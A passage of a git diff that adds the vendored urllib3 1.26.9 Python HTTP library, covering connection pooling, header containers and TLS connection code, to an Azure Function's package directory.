a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__init__.py new file mode 100644 index 0000000..c9d28bf --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__init__.py @@ -0,0 +1,85 @@ +""" +Python HTTP library with thread-safe connection pooling, file post support, user friendly, and more +""" +from __future__ import absolute_import + +# Set default logging handler to avoid "No handler found" warnings. +import logging +import warnings +from logging import NullHandler + +from . import exceptions +from ._version import __version__ +from .connectionpool import HTTPConnectionPool, HTTPSConnectionPool, connection_from_url +from .filepost import encode_multipart_formdata +from .poolmanager import PoolManager, ProxyManager, proxy_from_url +from .response import HTTPResponse +from .util.request import make_headers +from .util.retry import Retry +from .util.timeout import Timeout +from .util.url import get_host + +__author__ = "Andrey Petrov (andrey.petrov@shazow.net)" +__license__ = "MIT" +__version__ = __version__ + +__all__ = ( + "HTTPConnectionPool", + "HTTPSConnectionPool", + "PoolManager", + "ProxyManager", + "HTTPResponse", + "Retry", + "Timeout", + "add_stderr_logger", + "connection_from_url", + "disable_warnings", + "encode_multipart_formdata", + "get_host", + "make_headers", + "proxy_from_url", +) + +logging.getLogger(__name__).addHandler(NullHandler()) + + +def add_stderr_logger(level=logging.DEBUG): + """ + Helper for quickly adding a StreamHandler to the logger. Useful for + debugging. + + Returns the handler after adding it. + """ + # This method needs to be in this __init__.py to get the __name__ correct + # even if urllib3 is vendored within another package. + logger = logging.getLogger(__name__) + handler = logging.StreamHandler() + handler.setFormatter(logging.Formatter("%(asctime)s %(levelname)s %(message)s")) + logger.addHandler(handler) + logger.setLevel(level) + logger.debug("Added a stderr logging handler to logger: %s", __name__) + return handler + + +# ... Clean up. +del NullHandler + + +# All warning filters *must* be appended unless you're really certain that they +# shouldn't be: otherwise, it's very hard for users to use most Python +# mechanisms to silence them. +# SecurityWarning's always go off by default. +warnings.simplefilter("always", exceptions.SecurityWarning, append=True) +# SubjectAltNameWarning's should go off once per host +warnings.simplefilter("default", exceptions.SubjectAltNameWarning, append=True) +# InsecurePlatformWarning's don't vary between requests, so we keep it default. +warnings.simplefilter("default", exceptions.InsecurePlatformWarning, append=True) +# SNIMissingWarnings should go off only once. +warnings.simplefilter("default", exceptions.SNIMissingWarning, append=True) + + +def disable_warnings(category=exceptions.HTTPWarning): + """ + Helper for quickly disabling all urllib3 warnings. + """ + warnings.simplefilter("ignore", category) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..d265ad2 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/_collections.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/_collections.cpython-39.pyc new file mode 100644 index 0000000..3aa7195 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/_collections.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/_version.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/_version.cpython-39.pyc new file mode 100644 index 0000000..ef2e2c5 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/_version.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/connection.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/connection.cpython-39.pyc new file mode 100644 index 0000000..e5e0580 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/connection.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/connectionpool.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/connectionpool.cpython-39.pyc new file mode 100644 index 0000000..8156a0b Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/connectionpool.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/exceptions.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/exceptions.cpython-39.pyc new file mode 100644 index 0000000..48132e3 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/exceptions.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/fields.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/fields.cpython-39.pyc new file mode 100644 index 0000000..a23437c Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/fields.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/filepost.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/filepost.cpython-39.pyc new file mode 100644 index 0000000..65d5357 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/filepost.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/poolmanager.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/poolmanager.cpython-39.pyc new file mode 100644 index 0000000..8e2d545 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/poolmanager.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/request.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/request.cpython-39.pyc new file mode 100644 index 0000000..03ff6b4 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/request.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/response.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/response.cpython-39.pyc new file mode 100644 index 0000000..be5a6e6 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/__pycache__/response.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/_collections.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/_collections.py new file mode 100644 index 0000000..eaa8755 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/_collections.py @@ -0,0 +1,337 @@ +from __future__ import absolute_import + +try: + from collections.abc import Mapping, MutableMapping +except ImportError: + from collections import Mapping, MutableMapping +try: + from threading import RLock +except ImportError: # Platform-specific: No threads available + + class RLock: + def __enter__(self): + pass + + def __exit__(self, exc_type, exc_value, traceback): + pass + + +from collections import OrderedDict + +from .exceptions import InvalidHeader +from .packages import six +from .packages.six import iterkeys, itervalues + +__all__ = ["RecentlyUsedContainer", "HTTPHeaderDict"] + + +_Null = object() + + +class RecentlyUsedContainer(MutableMapping): + """ + Provides a thread-safe dict-like container which maintains up to + ``maxsize`` keys while throwing away the least-recently-used keys beyond + ``maxsize``. + + :param maxsize: + Maximum number of recent elements to retain. + + :param dispose_func: + Every time an item is evicted from the container, + ``dispose_func(value)`` is called. Callback which will get called + """ + + ContainerCls = OrderedDict + + def __init__(self, maxsize=10, dispose_func=None): + self._maxsize = maxsize + self.dispose_func = dispose_func + + self._container = self.ContainerCls() + self.lock = RLock() + + def __getitem__(self, key): + # Re-insert the item, moving it to the end of the eviction line. + with self.lock: + item = self._container.pop(key) + self._container[key] = item + return item + + def __setitem__(self, key, value): + evicted_value = _Null + with self.lock: + # Possibly evict the existing value of 'key' + evicted_value = self._container.get(key, _Null) + self._container[key] = value + + # If we didn't evict an existing value, we might have to evict the + # least recently used item from the beginning of the container. + if len(self._container) > self._maxsize: + _key, evicted_value = self._container.popitem(last=False) + + if self.dispose_func and evicted_value is not _Null: + self.dispose_func(evicted_value) + + def __delitem__(self, key): + with self.lock: + value = self._container.pop(key) + + if self.dispose_func: + self.dispose_func(value) + + def __len__(self): + with self.lock: + return len(self._container) + + def __iter__(self): + raise NotImplementedError( + "Iteration over this class is unlikely to be threadsafe." + ) + + def clear(self): + with self.lock: + # Copy pointers to all values, then wipe the mapping + values = list(itervalues(self._container)) + self._container.clear() + + if self.dispose_func: + for value in values: + self.dispose_func(value) + + def keys(self): + with self.lock: + return list(iterkeys(self._container)) + + +class HTTPHeaderDict(MutableMapping): + """ + :param headers: + An iterable of field-value pairs. Must not contain multiple field names + when compared case-insensitively. + + :param kwargs: + Additional field-value pairs to pass in to ``dict.update``. + + A ``dict`` like container for storing HTTP Headers. + + Field names are stored and compared case-insensitively in compliance with + RFC 7230. Iteration provides the first case-sensitive key seen for each + case-insensitive pair. + + Using ``__setitem__`` syntax overwrites fields that compare equal + case-insensitively in order to maintain ``dict``'s api. For fields that + compare equal, instead create a new ``HTTPHeaderDict`` and use ``.add`` + in a loop. + + If multiple fields that are equal case-insensitively are passed to the + constructor or ``.update``, the behavior is undefined and some will be + lost. + + >>> headers = HTTPHeaderDict() + >>> headers.add('Set-Cookie', 'foo=bar') + >>> headers.add('set-cookie', 'baz=quxx') + >>> headers['content-length'] = '7' + >>> headers['SET-cookie'] + 'foo=bar, baz=quxx' + >>> headers['Content-Length'] + '7' + """ + + def __init__(self, headers=None, **kwargs): + super(HTTPHeaderDict, self).__init__() + self._container = OrderedDict() + if headers is not None: + if isinstance(headers, HTTPHeaderDict): + self._copy_from(headers) + else: + self.extend(headers) + if kwargs: + self.extend(kwargs) + + def __setitem__(self, key, val): + self._container[key.lower()] = [key, val] + return self._container[key.lower()] + + def __getitem__(self, key): + val = self._container[key.lower()] + return ", ".join(val[1:]) + + def __delitem__(self, key): + del self._container[key.lower()] + + def __contains__(self, key): + return key.lower() in self._container + + def __eq__(self, other): + if not isinstance(other, Mapping) and not hasattr(other, "keys"): + return False + if not isinstance(other, type(self)): + other = type(self)(other) + return dict((k.lower(), v) for k, v in self.itermerged()) == dict( + (k.lower(), v) for k, v in other.itermerged() + ) + + def __ne__(self, other): + return not self.__eq__(other) + + if six.PY2: # Python 2 + iterkeys = MutableMapping.iterkeys + itervalues = MutableMapping.itervalues + + __marker = object() + + def __len__(self): + return len(self._container) + + def __iter__(self): + # Only provide the originally cased names + for vals in self._container.values(): + yield vals[0] + + def pop(self, key, default=__marker): + """D.pop(k[,d]) -> v, remove specified key and return the corresponding value. + If key is not found, d is returned if given, otherwise KeyError is raised. + """ + # Using the MutableMapping function directly fails due to the private marker. + # Using ordinary dict.pop would expose the internal structures. + # So let's reinvent the wheel. + try: + value = self[key] + except KeyError: + if default is self.__marker: + raise + return default + else: + del self[key] + return value + + def discard(self, key): + try: + del self[key] + except KeyError: + pass + + def add(self, key, val): + """Adds a (name, value) pair, doesn't overwrite the value if it already + exists. + + >>> headers = HTTPHeaderDict(foo='bar') + >>> headers.add('Foo', 'baz') + >>> headers['foo'] + 'bar, baz' + """ + key_lower = key.lower() + new_vals = [key, val] + # Keep the common case aka no item present as fast as possible + vals = self._container.setdefault(key_lower, new_vals) + if new_vals is not vals: + vals.append(val) + + def extend(self, *args, **kwargs): + """Generic import function for any type of header-like object. + Adapted version of MutableMapping.update in order to insert items + with self.add instead of self.__setitem__ + """ + if len(args) > 1: + raise TypeError( + "extend() takes at most 1 positional " + "arguments ({0} given)".format(len(args)) + ) + other = args[0] if len(args) >= 1 else () + + if isinstance(other, HTTPHeaderDict): + for key, val in other.iteritems(): + self.add(key, val) + elif isinstance(other, Mapping): + for key in other: + self.add(key, other[key]) + elif hasattr(other, "keys"): + for key in other.keys(): + self.add(key, other[key]) + else: + for key, value in other: + self.add(key, value) + + for key, value in kwargs.items(): + self.add(key, value) + + def getlist(self, key, default=__marker): + """Returns a list of all the values for the named field. Returns an + empty list if the key doesn't exist.""" + try: + vals = self._container[key.lower()] + except KeyError: + if default is self.__marker: + return [] + return default + else: + return vals[1:] + + # Backwards compatibility for httplib + getheaders = getlist + getallmatchingheaders = getlist + iget = getlist + + # Backwards compatibility for http.cookiejar + get_all = getlist + + def __repr__(self): + return "%s(%s)" % (type(self).__name__, dict(self.itermerged())) + + def _copy_from(self, other): + for key in other: + val = other.getlist(key) + if isinstance(val, list): + # Don't need to convert tuples + val = list(val) + self._container[key.lower()] = [key] + val + + def copy(self): + clone = type(self)() + clone._copy_from(self) + return clone + + def iteritems(self): + """Iterate over all header lines, including duplicate ones.""" + for key in self: + vals = self._container[key.lower()] + for val in vals[1:]: + yield vals[0], val + + def itermerged(self): + """Iterate over all headers, merging duplicate ones together.""" + for key in self: + val = self._container[key.lower()] + yield val[0], ", ".join(val[1:]) + + def items(self): + return list(self.iteritems()) + + @classmethod + def from_httplib(cls, message): # Python 2 + """Read headers from a Python 2 httplib message object.""" + # python2.7 does not expose a proper API for exporting multiheaders + # efficiently. This function re-reads raw lines from the message + # object and extracts the multiheaders properly. + obs_fold_continued_leaders = (" ", "\t") + headers = [] + + for line in message.headers: + if line.startswith(obs_fold_continued_leaders): + if not headers: + # We received a header line that starts with OWS as described + # in RFC-7230 S3.2.4. This indicates a multiline header, but + # there exists no previous header to which we can attach it. + raise InvalidHeader( + "Header continuation with no previous header: %s" % line + ) + else: + key, value = headers[-1] + headers[-1] = (key, value + " " + line.strip()) + continue + + key, value = line.split(":", 1) + headers.append((key, value.strip())) + + return cls(headers) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/_version.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/_version.py new file mode 100644 index 0000000..d75d8d6 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/_version.py @@ -0,0 +1,2 @@ +# This file is protected via CODEOWNERS +__version__ = "1.26.9" diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/connection.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/connection.py new file mode 100644 index 0000000..ebd84ec --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/connection.py @@ -0,0 +1,567 @@ +from __future__ import absolute_import + +import datetime +import logging +import os +import re +import socket +import warnings +from socket import error as SocketError +from socket import timeout as SocketTimeout + +from .packages import six +from .packages.six.moves.http_client import HTTPConnection as _HTTPConnection +from .packages.six.moves.http_client import HTTPException # noqa: F401 +from .util.proxy import create_proxy_ssl_context + +try: # Compiled with SSL? + import ssl + + BaseSSLError = ssl.SSLError +except (ImportError, AttributeError): # Platform-specific: No SSL. + ssl = None + + class BaseSSLError(BaseException): + pass + + +try: + # Python 3: not a no-op, we're adding this to the namespace so it can be imported. + ConnectionError = ConnectionError +except NameError: + # Python 2 + class ConnectionError(Exception): + pass + + +try: # Python 3: + # Not a no-op, we're adding this to the namespace so it can be imported. + BrokenPipeError = BrokenPipeError +except NameError: # Python 2: + + class BrokenPipeError(Exception): + pass + + +from ._collections import HTTPHeaderDict # noqa (historical, removed in v2) +from ._version import __version__ +from .exceptions import ( + ConnectTimeoutError, + NewConnectionError, + SubjectAltNameWarning, + SystemTimeWarning, +) +from .util import SKIP_HEADER, SKIPPABLE_HEADERS, connection +from .util.ssl_ import ( + assert_fingerprint, + create_urllib3_context, + is_ipaddress, + resolve_cert_reqs, + resolve_ssl_version, + ssl_wrap_socket, +) +from .util.ssl_match_hostname import CertificateError, match_hostname + +log = logging.getLogger(__name__) + +port_by_scheme = {"http": 80, "https": 443} + +# When it comes time to update this value as a part of regular maintenance +# (ie test_recent_date is failing) update it to ~6 months before the current date. +RECENT_DATE = datetime.date(2020, 7, 1) + +_CONTAINS_CONTROL_CHAR_RE = re.compile(r"[^-!#$%&'*+.^_`|~0-9a-zA-Z]") + + +class HTTPConnection(_HTTPConnection, object): + """ + Based on :class:`http.client.HTTPConnection` but provides an extra constructor + backwards-compatibility layer between older and newer Pythons. + + Additional keyword parameters are used to configure attributes of the connection. + Accepted parameters include: + + - ``strict``: See the documentation on :class:`urllib3.connectionpool.HTTPConnectionPool` + - ``source_address``: Set the source address for the current connection. + - ``socket_options``: Set specific options on the underlying socket. If not specified, then + defaults are loaded from ``HTTPConnection.default_socket_options`` which includes disabling + Nagle's algorithm (sets TCP_NODELAY to 1) unless the connection is behind a proxy. + + For example, if you wish to enable TCP Keep Alive in addition to the defaults, + you might pass: + + .. code-block:: python + + HTTPConnection.default_socket_options + [ + (socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1), + ] + + Or you may want to disable the defaults by passing an empty list (e.g., ``[]``). + """ + + default_port = port_by_scheme["http"] + + #: Disable Nagle's algorithm by default. + #: ``[(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)]`` + default_socket_options = [(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)] + + #: Whether this connection verifies the host's certificate. + is_verified = False + + #: Whether this proxy connection (if used) verifies the proxy host's + #: certificate. + proxy_is_verified = None + + def __init__(self, *args, **kw): + if not six.PY2: + kw.pop("strict", None) + + # Pre-set source_address. + self.source_address = kw.get("source_address") + + #: The socket options provided by the user. If no options are + #: provided, we use the default options. + self.socket_options = kw.pop("socket_options", self.default_socket_options) + + # Proxy options provided by the user. + self.proxy = kw.pop("proxy", None) + self.proxy_config = kw.pop("proxy_config", None) + + _HTTPConnection.__init__(self, *args, **kw) + + @property + def host(self): + """ + Getter method to remove any trailing dots that indicate the hostname is an FQDN. + + In general, SSL certificates don't include the trailing dot indicating a + fully-qualified domain name, and thus, they don't validate properly when + checked against a domain name that includes the dot. In addition, some + servers may not expect to receive the trailing dot when provided. + + However, the hostname with trailing dot is critical to DNS resolution; doing a + lookup with the trailing dot will properly only resolve the appropriate FQDN, + whereas a lookup without a trailing dot will search the system's search domain + list. Thus, it's important to keep the original host around for use only in + those cases where it's appropriate (i.e., when doing DNS lookup to establish the + actual TCP connection across which we're going to send HTTP requests). + """ + return self._dns_host.rstrip(".") + + @host.setter + def host(self, value): + """ + Setter for the `host` property. + + We assume that only urllib3 uses the _dns_host attribute; httplib itself + only uses `host`, and it seems reasonable that other libraries follow suit. + """ + self._dns_host = value + + def _new_conn(self): + """Establish a socket connection and set nodelay settings on it. + + :return: New socket connection. + """ + extra_kw = {} + if self.source_address: + extra_kw["source_address"] = self.source_address + + if self.socket_options: + extra_kw["socket_options"] = self.socket_options + + try: + conn = connection.create_connection( + (self._dns_host, self.port), self.timeout, **extra_kw + ) + + except SocketTimeout: + raise ConnectTimeoutError( + self, + "Connection to %s timed out. (connect timeout=%s)" + % (self.host, self.timeout), + ) + + except SocketError as e: + raise NewConnectionError( + self, "Failed to establish a new connection: %s" % e + ) + + return conn + + def _is_using_tunnel(self): + # Google App Engine's httplib does not define _tunnel_host + return getattr(self, "_tunnel_host", None) + + def _prepare_conn(self, conn): + self.sock = conn + if self._is_using_tunnel(): + # TODO: Fix tunnel so it doesn't depend on self.sock state. + self._tunnel() + # Mark this connection as not reusable + self.auto_open = 0 + + def connect(self): + conn = self._new_conn() + self._prepare_conn(conn) + + def putrequest(self, method, url, *args, **kwargs): + """ """ + # Empty docstring because the indentation of CPython's implementation + # is broken but we don't want this method in our documentation. + match = _CONTAINS_CONTROL_CHAR_RE.search(method) + if match: + raise ValueError( + "Method cannot contain non-token characters %r (found at least %r)" + % (method, match.group()) + ) + + return _HTTPConnection.putrequest(self, method, url, *args, **kwargs) + + def putheader(self, header, *values): + """ """ + if not any(isinstance(v, str) and v == SKIP_HEADER for v in values): + _HTTPConnection.putheader(self, header, *values) + elif six.ensure_str(header.lower()) not in SKIPPABLE_HEADERS: + raise ValueError( + "urllib3.util.SKIP_HEADER only supports '%s'" + % ("', '".join(map(str.title, sorted(SKIPPABLE_HEADERS))),) + ) + + def request(self, method, url, body=None, headers=None): + if headers is None: + headers = {} + else: + # Avoid modifying the headers passed into .request() + headers = headers.copy() + if "user-agent" not in (six.ensure_str(k.lower()) for k in headers): + headers["User-Agent"] = _get_default_user_agent() + super(HTTPConnection, self).request(method, url, body=body, headers=headers) + + def request_chunked(self, method, url, body=None, headers=None): + """ + Alternative to the common request method, which sends the + body with chunked encoding and not as one block + """ + headers = headers or {} + header_keys = set([six.ensure_str(k.lower()) for k in headers]) + skip_accept_encoding = "accept-encoding" in header_keys + skip_host = "host" in header_keys + self.putrequest( + method, url, skip_accept_encoding=skip_accept_encoding, skip_host=skip_host + ) + if "user-agent" not in header_keys: + self.putheader("User-Agent", _get_default_user_agent()) + for header, value in headers.items(): + self.putheader(header, value) + if "transfer-encoding" not in header_keys: + self.putheader("Transfer-Encoding", "chunked") + self.endheaders() + + if body is not None: + stringish_types = six.string_types + (bytes,) + if isinstance(body, stringish_types): + body = (body,) + for chunk in body: + if not chunk: + continue + if not isinstance(chunk, bytes): + chunk = chunk.encode("utf8") + len_str = hex(len(chunk))[2:] + to_send = bytearray(len_str.encode()) + to_send += b"\r\n" + to_send += chunk + to_send += b"\r\n" + self.send(to_send) + + # After the if clause, to always have a closed body + self.send(b"0\r\n\r\n") + + +class HTTPSConnection(HTTPConnection): + """ + Many of the parameters to this constructor are passed to the underlying SSL + socket by means of :py:func:`urllib3.util.ssl_wrap_socket`. + """ + + default_port = port_by_scheme["https"] + + cert_reqs = None + ca_certs = None + ca_cert_dir = None + ca_cert_data = None + ssl_version = None + assert_fingerprint = None + tls_in_tls_required = False + + def __init__( + self, + host, + port=None, + key_file=None, + cert_file=None, + key_password=None, + strict=None, + timeout=socket._GLOBAL_DEFAULT_TIMEOUT, + ssl_context=None, + server_hostname=None, + **kw + ): + + HTTPConnection.__init__(self, host, port, strict=strict, timeout=timeout, **kw) + + self.key_file = key_file + self.cert_file = cert_file + self.key_password = key_password + self.ssl_context = ssl_context + self.server_hostname = server_hostname + + # Required property for Google AppEngine 1.9.0 which otherwise causes + # HTTPS requests to go out as HTTP. (See Issue #356) + self._protocol = "https" + + def set_cert( + self, + key_file=None, + cert_file=None, + cert_reqs=None, + key_password=None, + ca_certs=None, + assert_hostname=None, + assert_fingerprint=None, + ca_cert_dir=None, + ca_cert_data=None, + ): + """ + This method should only be called once, before the connection is used. + """ + # If cert_reqs is not provided we'll assume CERT_REQUIRED unless we also + # have an SSLContext object in which case we'll use its verify_mode. + if cert_reqs is None: + if self.ssl_context is not None: + cert_reqs = self.ssl_context.verify_mode + else: + cert_reqs = resolve_cert_reqs(None) + + self.key_file = key_file + self.cert_file = cert_file + self.cert_reqs = cert_reqs + self.key_password = key_password + self.assert_hostname = assert_hostname + self.assert_fingerprint = assert_fingerprint + self.ca_certs = ca_certs and os.path.expanduser(ca_certs) + self.ca_cert_dir = ca_cert_dir and os.path.expanduser(ca_cert_dir) + self.ca_cert_data = ca_cert_data + + def connect(self): + # Add certificate verification + self.sock = conn = self._new_conn() + hostname = self.host + tls_in_tls = False + + if self._is_using_tunnel(): + if self.tls_in_tls_required: + self.sock = conn = self._connect_tls_proxy(hostname, conn) + tls_in_tls = True + + # Calls self._set_hostport(), so self.host is + # self._tunnel_host below. + self._tunnel() + # Mark this connection as not reusable + self.auto_open = 0 + + # Override the host with the one we're requesting data from. + hostname = self._tunnel_host + + server_hostname = hostname + if self.server_hostname is not None: + server_hostname = self.server_hostname + + is_time_off = datetime.date.today() < RECENT_DATE + if is_time_off: + warnings.warn( + ( + "System time is way off (before {0}). This will probably " + "lead to SSL verification errors" + ).format(RECENT_DATE), + SystemTimeWarning, + ) + + # Wrap socket using verification with the root certs in + # trusted_root_certs + default_ssl_context = False + if self.ssl_context is None: + default_ssl_context = True + self.ssl_context = create_urllib3_context( + ssl_version=resolve_ssl_version(self.ssl_version), + cert_reqs=resolve_cert_reqs(self.cert_reqs), + ) + + context = self.ssl_context + context.verify_mode = resolve_cert_reqs(self.cert_reqs) + + # Try to load OS default certs if none are given. + # Works well on Windows (requires Python3.4+) + if ( + not self.ca_certs + and not self.ca_cert_dir + and not self.ca_cert_data + and default_ssl_context + and hasattr(context, "load_default_certs") + ): + context.load_default_certs() + + self.sock = ssl_wrap_socket( + sock=conn, + keyfile=self.key_file, + certfile=self.cert_file, + key_password=self.key_password, + ca_certs=self.ca_certs, + ca_cert_dir=self.ca_cert_dir, + ca_cert_data=self.ca_cert_data, + server_hostname=server_hostname, + ssl_context=context, + tls_in_tls=tls_in_tls, + ) + + # If we're using all defaults and the connection + # is TLSv1 or TLSv1.1 we throw a DeprecationWarning + # for the host. + if ( + default_ssl_context + and self.ssl_version is None + and hasattr(self.sock, "version") + and self.sock.version() in {"TLSv1", "TLSv1.1"} + ): + warnings.warn( + "Negotiating TLSv1/TLSv1.1 by default is deprecated " + "and will be disabled in urllib3 v2.0.0. Connecting to " + "'%s' with '%s' can be enabled by explicitly opting-in " + "with 'ssl_version'" % (self.host, self.sock.version()), + DeprecationWarning, + ) + + if self.assert_fingerprint: + assert_fingerprint( + self.sock.getpeercert(binary_form=True), self.assert_fingerprint + ) + elif ( + context.verify_mode != ssl.CERT_NONE + and not getattr(context, "check_hostname", False) + and self.assert_hostname is not False + ): + # While urllib3 attempts to always turn off hostname matching from + # the TLS library, this cannot always be done. So we check whether + # the TLS Library still thinks it's matching hostnames. + cert = self.sock.getpeercert() + if not cert.get("subjectAltName", ()): + warnings.warn( + ( + "Certificate for {0} has no `subjectAltName`, falling back to check for a " + "`commonName` for now. This feature is being removed by major browsers and " + "deprecated by RFC 2818. (See https://github.com/urllib3/urllib3/issues/497 " + "for details.)".format(hostname) + ), + SubjectAltNameWarning, + ) + _match_hostname(cert, self.assert_hostname or server_hostname) + + self.is_verified = ( + context.verify_mode == ssl.CERT_REQUIRED + or self.assert_fingerprint is not None + ) + + def _connect_tls_proxy(self, hostname, conn): + """ + Establish a TLS connection to the proxy using the provided SSL context. + """ + proxy_config = self.proxy_config + ssl_context = proxy_config.ssl_context + if ssl_context: + # If the user provided a proxy context, we assume CA and client + # certificates have already been set + return ssl_wrap_socket( + sock=conn, + server_hostname=hostname, + ssl_context=ssl_context, + ) + + ssl_context = create_proxy_ssl_context( + self.ssl_version, + self.cert_reqs, + self.ca_certs, + self.ca_cert_dir, + self.ca_cert_data, + ) + + # If no cert was provided, use only the default options for server + # certificate validation + socket = ssl_wrap_socket( + sock=conn, + ca_certs=self.ca_certs, + ca_cert_dir=self.ca_cert_dir, + ca_cert_data=self.ca_cert_data, + server_hostname=hostname, + ssl_context=ssl_context, + ) + + if ssl_context.verify_mode != ssl.CERT_NONE and not getattr( + ssl_context, "check_hostname", False + ): + # While urllib3 attempts to always turn off hostname matching from + # the TLS library, this cannot always be done. So we check whether + # the TLS Library still thinks it's matching hostnames. + cert = socket.getpeercert() + if not cert.get("subjectAltName", ()): + warnings.warn( + ( + "Certificate for {0} has no `subjectAltName`, falling back to check for a " + "`commonName` for now. This feature is being removed by major browsers and " + "deprecated by RFC 2818. (See https://github.com/urllib3/urllib3/issues/497 " + "for details.)".format(hostname) + ), + SubjectAltNameWarning, + ) + _match_hostname(cert, hostname) + + self.proxy_is_verified = ssl_context.verify_mode == ssl.CERT_REQUIRED + return socket + + +def _match_hostname(cert, asserted_hostname): + # Our upstream implementation of ssl.match_hostname() + # only applies this normalization to IP addresses so it doesn't + # match DNS SANs so we do the same thing! + stripped_hostname = asserted_hostname.strip("u[]") + if is_ipaddress(stripped_hostname): + asserted_hostname = stripped_hostname + + try: + match_hostname(cert, asserted_hostname) + except CertificateError as e: + log.warning( + "Certificate did not match expected hostname: %s. Certificate: %s", + asserted_hostname, + cert, + ) + # Add cert to exception and reraise so client code can inspect + # the cert when catching the exception, if they want to + e._peer_cert = cert + raise + + +def _get_default_user_agent(): + return "python-urllib3/%s" % __version__ + + +class DummyConnection(object): + """Used to detect a failed ConnectionCls import.""" + + pass + + +if not ssl: + HTTPSConnection = DummyConnection # noqa: F811 + + +VerifiedHTTPSConnection = HTTPSConnection diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/connectionpool.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/connectionpool.py new file mode 100644 index 0000000..b6c99e9 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/connectionpool.py @@ -0,0 +1,1108 @@ +from __future__ import absolute_import + +import errno +import logging +import re +import socket +import sys +import warnings +from socket import error as SocketError +from socket import timeout as SocketTimeout + +from .connection import ( + BaseSSLError, + BrokenPipeError, + DummyConnection, + HTTPConnection, + HTTPException, + HTTPSConnection, + VerifiedHTTPSConnection, + port_by_scheme, +) +from .exceptions import ( + ClosedPoolError, + EmptyPoolError, + HeaderParsingError, + HostChangedError, + InsecureRequestWarning, + LocationValueError, + MaxRetryError, + NewConnectionError, + ProtocolError, + ProxyError, + ReadTimeoutError, + SSLError, + TimeoutError, +) +from .packages import six +from .packages.six.moves import queue +from .request import RequestMethods +from .response import HTTPResponse +from .util.connection import is_connection_dropped +from 